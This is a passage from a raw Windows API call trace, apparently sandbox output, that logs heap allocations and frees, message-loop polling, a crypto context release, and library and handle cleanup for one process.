lpsz="__CRYPT_CONTEXT") returned 0xf [0260.448] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0260.448] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0260.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0260.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0260.448] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a00 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0260.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0260.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0260.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0260.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0260.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0260.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0260.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0260.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0260.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0260.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0260.450] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0260.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0260.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0260.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0260.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0260.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0260.450] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0260.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0260.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0260.450] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0260.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0260.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0260.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0260.450] FreeLibrary (hLibModule=0x756e0000) returned 1 [0260.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0260.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0260.451] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0260.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0260.451] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0260.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0260.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0260.451] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0260.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0260.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0260.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0260.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0260.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0260.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0260.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0260.451] CloseHandle (hObject=0x2a0) returned 1 [0260.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0260.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0260.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0260.455] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0260.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0260.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0260.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0260.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0260.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0260.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0260.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0260.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0260.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0260.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0260.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0260.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0260.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0260.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0260.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0260.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0260.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0260.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0260.456] CloseHandle (hObject=0x2d0) returned 1 [0261.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0261.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0261.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0261.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0261.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0261.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0261.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0261.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0261.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0261.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0261.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0261.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0261.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0261.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0261.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0261.432] TranslateMessage (lpMsg=0x8cf708) returned 0 [0261.432] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0261.432] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0261.432] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0261.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0261.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0261.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0261.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0261.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0261.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0261.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0261.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0261.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0261.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0261.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0261.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0261.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0261.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0261.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0261.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0261.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0261.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0261.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0261.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0261.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0261.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0261.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0261.435] HeapFree (in: hHeap=0x970000, 